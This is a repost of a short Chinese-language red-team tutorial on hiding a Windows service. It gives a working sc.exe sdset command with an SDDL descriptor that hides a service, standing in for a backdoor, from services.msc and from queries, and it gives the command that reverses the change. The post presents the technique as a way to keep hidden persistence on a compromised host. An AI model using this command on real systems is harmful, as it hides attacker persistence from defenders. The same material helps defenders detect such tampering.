红队策略:隐藏Windows服务

admin 2022年2月28日16:15:09评论109 views字数 761阅读2分32秒阅读模式

from:https://www.sans.org/blog/red-team-tactics-hiding-windows-services/

Windows的一个功能允许红队或攻击者将服务隐藏起来,从而为逃避基于主机的常见威胁搜寻技术的检测提供了机会。

这里假设Fax服务是我们的恶意文件或后门

打开services.msc可以看到服务

红队策略:隐藏Windows服务

执行命令可以看到服务

红队策略:隐藏Windows服务

管理员权限下执行以下命令,安全标识符定义语言(SDDL)

& $env:SystemRootSystem32sc.exe sdset Fax "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"


红队策略:隐藏Windows服务

可以看到服务视图中已经查询不到了

红队策略:隐藏Windows服务

红队策略:隐藏Windows服务

在红队或渗透测试中,这可能是一种有用的技术,可以在受感染主机上保持持久性。重启后,隐藏的服务也会自动启动。

取消隐藏的命令

& $env:SystemRootSystem32sc.exe sdset Fax "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"


本文始发于微信公众号(关注安全技术):红队策略:隐藏Windows服务

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年2月28日16:15:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红队策略:隐藏Windows服务https://cn-sec.com/archives/500844.html

发表评论

匿名网友 填写信息